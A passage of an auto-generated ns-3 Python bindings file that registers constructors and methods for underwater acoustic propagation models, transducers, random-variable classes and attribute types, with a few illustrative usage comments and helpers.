[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'mode')],
is_virtual=True)
## uan-prop-model-ideal.h (module 'uan'): ns3::UanPdp ns3::UanPropModelIdeal::GetPdp(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode mode) [member function]
cls.add_method('GetPdp',
'ns3::UanPdp',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'mode')],
is_virtual=True)
## uan-prop-model-ideal.h (module 'uan'): static ns3::TypeId ns3::UanPropModelIdeal::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPropModelThorp_methods(root_module, cls):
## uan-prop-model-thorp.h (module 'uan'): ns3::UanPropModelThorp::UanPropModelThorp(ns3::UanPropModelThorp const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPropModelThorp const &', 'arg0')])
## uan-prop-model-thorp.h (module 'uan'): ns3::UanPropModelThorp::UanPropModelThorp() [constructor]
cls.add_constructor([])
## uan-prop-model-thorp.h (module 'uan'): ns3::Time ns3::UanPropModelThorp::GetDelay(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode mode) [member function]
cls.add_method('GetDelay',
'ns3::Time',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'mode')],
is_virtual=True)
## uan-prop-model-thorp.h (module 'uan'): double ns3::UanPropModelThorp::GetPathLossDb(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode mode) [member function]
cls.add_method('GetPathLossDb',
'double',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'mode')],
is_virtual=True)
## uan-prop-model-thorp.h (module 'uan'): ns3::UanPdp ns3::UanPropModelThorp::GetPdp(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode mode) [member function]
cls.add_method('GetPdp',
'ns3::UanPdp',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'mode')],
is_virtual=True)
## uan-prop-model-thorp.h (module 'uan'): static ns3::TypeId ns3::UanPropModelThorp::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
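# Illustrative note (not part of the generated scan): the propagation models registered
# above all implement GetDelay/GetPathLossDb/GetPdp taking two MobilityModel pointers
# and a UanTxMode. Hedged sketch, assuming ns.uan and ns.mobility are both built:
#
#   import ns.uan, ns.mobility
#   prop = ns.uan.UanPropModelIdeal()
#   a = ns.mobility.ConstantPositionMobilityModel()
#   b = ns.mobility.ConstantPositionMobilityModel()
#   loss = prop.GetPathLossDb(a, b, ns.uan.UanTxMode())  # mirrors the signature above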
def register_Ns3UanTransducer_methods(root_module, cls):
## uan-transducer.h (module 'uan'): ns3::UanTransducer::UanTransducer() [constructor]
cls.add_constructor([])
## uan-transducer.h (module 'uan'): ns3::UanTransducer::UanTransducer(ns3::UanTransducer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanTransducer const &', 'arg0')])
## uan-transducer.h (module 'uan'): void ns3::UanTransducer::AddPhy(ns3::Ptr<ns3::UanPhy> phy) [member function]
cls.add_method('AddPhy',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'phy')],
is_pure_virtual=True, is_virtual=True)
## uan-transducer.h (module 'uan'): void ns3::UanTransducer::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-transducer.h (module 'uan'): std::list<ns3::UanPacketArrival, std::allocator<ns3::UanPacketArrival> > const & ns3::UanTransducer::GetArrivalList() const [member function]
cls.add_method('GetArrivalList',
'std::list< ns3::UanPacketArrival > const &',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-transducer.h (module 'uan'): ns3::Ptr<ns3::UanChannel> ns3::UanTransducer::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::UanChannel >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-transducer.h (module 'uan'): std::list<ns3::Ptr<ns3::UanPhy>, std::allocator<ns3::Ptr<ns3::UanPhy> > > const & ns3::UanTransducer::GetPhyList() const [member function]
cls.add_method('GetPhyList',
'std::list< ns3::Ptr< ns3::UanPhy > > const &',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-transducer.h (module 'uan'): ns3::UanTransducer::State ns3::UanTransducer::GetState() const [member function]
cls.add_method('GetState',
'ns3::UanTransducer::State',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-transducer.h (module 'uan'): static ns3::TypeId ns3::UanTransducer::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-transducer.h (module 'uan'): bool ns3::UanTransducer::IsRx() const [member function]
cls.add_method('IsRx',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-transducer.h (module 'uan'): bool ns3::UanTransducer::IsTx() const [member function]
cls.add_method('IsTx',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-transducer.h (module 'uan'): void ns3::UanTransducer::Receive(ns3::Ptr<ns3::Packet> packet, double rxPowerDb, ns3::UanTxMode txMode, ns3::UanPdp pdp) [member function]
cls.add_method('Receive',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'rxPowerDb'), param('ns3::UanTxMode', 'txMode'), param('ns3::UanPdp', 'pdp')],
is_pure_virtual=True, is_virtual=True)
## uan-transducer.h (module 'uan'): void ns3::UanTransducer::SetChannel(ns3::Ptr<ns3::UanChannel> chan) [member function]
cls.add_method('SetChannel',
'void',
[param('ns3::Ptr< ns3::UanChannel >', 'chan')],
is_pure_virtual=True, is_virtual=True)
## uan-transducer.h (module 'uan'): void ns3::UanTransducer::Transmit(ns3::Ptr<ns3::UanPhy> src, ns3::Ptr<ns3::Packet> packet, double txPowerDb, ns3::UanTxMode txMode) [member function]
cls.add_method('Transmit',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'src'), param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'txPowerDb'), param('ns3::UanTxMode', 'txMode')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3UanTransducerHd_methods(root_module, cls):
## uan-transducer-hd.h (module 'uan'): ns3::UanTransducerHd::UanTransducerHd(ns3::UanTransducerHd const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanTransducerHd const &', 'arg0')])
## uan-transducer-hd.h (module 'uan'): ns3::UanTransducerHd::UanTransducerHd() [constructor]
cls.add_constructor([])
## uan-transducer-hd.h (module 'uan'): void ns3::UanTransducerHd::AddPhy(ns3::Ptr<ns3::UanPhy> arg0) [member function]
cls.add_method('AddPhy',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'arg0')],
is_virtual=True)
## uan-transducer-hd.h (module 'uan'): void ns3::UanTransducerHd::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-transducer-hd.h (module 'uan'): std::list<ns3::UanPacketArrival, std::allocator<ns3::UanPacketArrival> > const & ns3::UanTransducerHd::GetArrivalList() const [member function]
cls.add_method('GetArrivalList',
'std::list< ns3::UanPacketArrival > const &',
[],
is_const=True, is_virtual=True)
## uan-transducer-hd.h (module 'uan'): ns3::Ptr<ns3::UanChannel> ns3::UanTransducerHd::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::UanChannel >',
[],
is_const=True, is_virtual=True)
## uan-transducer-hd.h (module 'uan'): std::list<ns3::Ptr<ns3::UanPhy>, std::allocator<ns3::Ptr<ns3::UanPhy> > > const & ns3::UanTransducerHd::GetPhyList() const [member function]
cls.add_method('GetPhyList',
'std::list< ns3::Ptr< ns3::UanPhy > > const &',
[],
is_const=True, is_virtual=True)
## uan-transducer-hd.h (module 'uan'): ns3::UanTransducer::State ns3::UanTransducerHd::GetState() const [member function]
cls.add_method('GetState',
'ns3::UanTransducer::State',
[],
is_const=True, is_virtual=True)
## uan-transducer-hd.h (module 'uan'): static ns3::TypeId ns3::UanTransducerHd::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-transducer-hd.h (module 'uan'): bool ns3::UanTransducerHd::IsRx() const [member function]
cls.add_method('IsRx',
'bool',
[],
is_const=True, is_virtual=True)
## uan-transducer-hd.h (module 'uan'): bool ns3::UanTransducerHd::IsTx() const [member function]
cls.add_method('IsTx',
'bool',
[],
is_const=True, is_virtual=True)
## uan-transducer-hd.h (module 'uan'): void ns3::UanTransducerHd::Receive(ns3::Ptr<ns3::Packet> packet, double rxPowerDb, ns3::UanTxMode txMode, ns3::UanPdp pdp) [member function]
cls.add_method('Receive',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'rxPowerDb'), param('ns3::UanTxMode', 'txMode'), param('ns3::UanPdp', 'pdp')],
is_virtual=True)
## uan-transducer-hd.h (module 'uan'): void ns3::UanTransducerHd::SetChannel(ns3::Ptr<ns3::UanChannel> chan) [member function]
cls.add_method('SetChannel',
'void',
[param('ns3::Ptr< ns3::UanChannel >', 'chan')],
is_virtual=True)
## uan-transducer-hd.h (module 'uan'): void ns3::UanTransducerHd::Transmit(ns3::Ptr<ns3::UanPhy> src, ns3::Ptr<ns3::Packet> packet, double txPowerDb, ns3::UanTxMode txMode) [member function]
cls.add_method('Transmit',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'src'), param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'txPowerDb'), param('ns3::UanTxMode', 'txMode')],
is_virtual=True)
## uan-transducer-hd.h (module 'uan'): void ns3::UanTransducerHd::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
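# Illustrative note (not generator output): every UanTransducer method above is
# registered with is_pure_virtual=True, so the base class is exposed as an
# abstract interface, while UanTransducerHd re-registers the same signatures as
# plain virtuals and is the class Python code actually instantiates. A minimal
# sketch, assuming the usual 'ns.uan' module layout and that UanChannel is
# registered elsewhere in this module; this helper is never invoked here.
def _example_half_duplex_transducer():
    import ns.uan
    trans = ns.uan.UanTransducerHd()    # concrete half-duplex transducer
    chan = ns.uan.UanChannel()          # assumed; bound outside this excerpt
    trans.SetChannel(chan)
    # The const virtual queries registered above:
    return trans.IsRx(), trans.IsTx(), trans.GetState()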
def register_Ns3UniformRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::UniformRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::UniformRandomVariable::UniformRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetMin() const [member function]
cls.add_method('GetMin',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetMax() const [member function]
cls.add_method('GetMax',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetValue(double min, double max) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'min'), param('double', 'max')])
## random-variable-stream.h (module 'core'): uint32_t ns3::UniformRandomVariable::GetInteger(uint32_t min, uint32_t max) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'min'), param('uint32_t', 'max')])
## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::UniformRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
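# Illustrative sketch (not generator output): the random-variable classes in this
# file all follow the same shape -- parameterized GetValue/GetInteger overloads
# plus the parameterless virtual pair that draws from attribute-configured
# parameters. SetAttribute and the "Min"/"Max" attribute names come from the
# wider ns-3 core API and are assumptions, not part of this excerpt.
def _example_uniform_random_variable():
    import ns.core
    rv = ns.core.UniformRandomVariable()
    x = rv.GetValue(0.0, 10.0)    # explicit-bounds overload registered above
    n = rv.GetInteger(1, 6)       # uint32_t overload registered above
    rv.SetAttribute("Min", ns.core.DoubleValue(0.0))   # assumed from ns3::Object
    rv.SetAttribute("Max", ns.core.DoubleValue(1.0))
    y = rv.GetValue()             # parameterless virtual uses the attributes
    return x, n, y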
def register_Ns3WeibullRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::WeibullRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::WeibullRandomVariable::WeibullRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetScale() const [member function]
cls.add_method('GetScale',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetShape() const [member function]
cls.add_method('GetShape',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetBound() const [member function]
cls.add_method('GetBound',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetValue(double scale, double shape, double bound) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'scale'), param('double', 'shape'), param('double', 'bound')])
## random-variable-stream.h (module 'core'): uint32_t ns3::WeibullRandomVariable::GetInteger(uint32_t scale, uint32_t shape, uint32_t bound) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'scale'), param('uint32_t', 'shape'), param('uint32_t', 'bound')])
## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::WeibullRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3ZetaRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ZetaRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ZetaRandomVariable::ZetaRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetAlpha() const [member function]
cls.add_method('GetAlpha',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetValue(double alpha) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'alpha')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ZetaRandomVariable::GetInteger(uint32_t alpha) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'alpha')])
## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ZetaRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3ZipfRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ZipfRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ZipfRandomVariable::ZipfRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetAlpha() const [member function]
cls.add_method('GetAlpha',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetValue(uint32_t n, double alpha) [member function]
cls.add_method('GetValue',
'double',
[param('uint32_t', 'n'), param('double', 'alpha')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetInteger(uint32_t n, uint32_t alpha) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'n'), param('uint32_t', 'alpha')])
## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function]
cls.add_method('CreateValidValue',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::AttributeValue const &', 'value')],
is_const=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3BooleanChecker_methods(root_module, cls):
## boolean.h (module 'core'): ns3::BooleanChecker::BooleanChecker() [constructor]
cls.add_constructor([])
## boolean.h (module 'core'): ns3::BooleanChecker::BooleanChecker(ns3::BooleanChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::BooleanChecker const &', 'arg0')])
return
def register_Ns3BooleanValue_methods(root_module, cls):
cls.add_output_stream_operator()
## boolean.h (module 'core'): ns3::BooleanValue::BooleanValue(ns3::BooleanValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::BooleanValue const &', 'arg0')])
## boolean.h (module 'core'): ns3::BooleanValue::BooleanValue() [constructor]
cls.add_constructor([])
## boolean.h (module 'core'): ns3::BooleanValue::BooleanValue(bool value) [constructor]
cls.add_constructor([param('bool', 'value')])
## boolean.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::BooleanValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## boolean.h (module 'core'): bool ns3::BooleanValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## boolean.h (module 'core'): bool ns3::BooleanValue::Get() const [member function]
cls.add_method('Get',
'bool',
[],
is_const=True)
## boolean.h (module 'core'): std::string ns3::BooleanValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## boolean.h (module 'core'): void ns3::BooleanValue::Set(bool value) [member function]
cls.add_method('Set',
'void',
[param('bool', 'value')])
return
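# Illustrative sketch (not generator output): the *Value classes registered in
# this block share the Copy/Get/Set/Serialize contract of ns3::AttributeValue;
# BooleanValue is the simplest case. The MakeBooleanChecker helper mentioned in
# the comment is assumed from ns-3 core and is not part of this excerpt.
def _example_boolean_attribute_value():
    import ns.core
    v = ns.core.BooleanValue(True)
    assert v.Get()
    v.Set(False)
    clone = v.Copy()    # returns a Ptr<AttributeValue> holding the same boolean
    # SerializeToString/DeserializeFromString additionally take a
    # Ptr<const AttributeChecker> (e.g. from ns.core.MakeBooleanChecker(), assumed)
    # and round-trip the value as the strings "true"/"false".
    return clone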
def register_Ns3CallbackChecker_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
return
def register_Ns3CallbackImplBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackValue_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function]
cls.add_method('Set',
'void',
[param('ns3::CallbackBase', 'base')])
return
def register_Ns3Channel_methods(root_module, cls):
## channel.h (module 'network'): ns3::Channel::Channel(ns3::Channel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Channel const &', 'arg0')])
## channel.h (module 'network'): ns3::Channel::Channel() [constructor]
cls.add_constructor([])
## channel.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Channel::GetDevice(uint32_t i) const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'i')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## channel.h (module 'network'): uint32_t ns3::Channel::GetId() const [member function]
cls.add_method('GetId',
'uint32_t',
[],
is_const=True)
## channel.h (module 'network'): uint32_t ns3::Channel::GetNDevices() const [member function]
cls.add_method('GetNDevices',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## channel.h (module 'network'): static ns3::TypeId ns3::Channel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
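# Illustrative sketch (not generator output): ns3::Channel is an abstract base;
# its GetDevice/GetNDevices are registered above as pure virtuals. Any concrete
# channel (for example the UanChannel bound elsewhere in this module) can be
# walked from Python like this; the helper is never invoked by the generator.
def _example_iterate_channel_devices(channel):
    # 'channel' is any concrete ns3::Channel subclass instance.
    devices = []
    for i in range(channel.GetNDevices()):
        devices.append(channel.GetDevice(i))
    return devices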
def register_Ns3ConstantRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ConstantRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ConstantRandomVariable::ConstantRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetConstant() const [member function]
cls.add_method('GetConstant',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetValue(double constant) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'constant')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ConstantRandomVariable::GetInteger(uint32_t constant) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'constant')])
## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ConstantRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3DeterministicRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::DeterministicRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::DeterministicRandomVariable::DeterministicRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): void ns3::DeterministicRandomVariable::SetValueArray(double * values, uint64_t length) [member function]
cls.add_method('SetValueArray',
'void',
[param('double *', 'values'), param('uint64_t', 'length')])
## random-variable-stream.h (module 'core'): double ns3::DeterministicRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::DeterministicRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3DeviceEnergyModel_methods(root_module, cls):
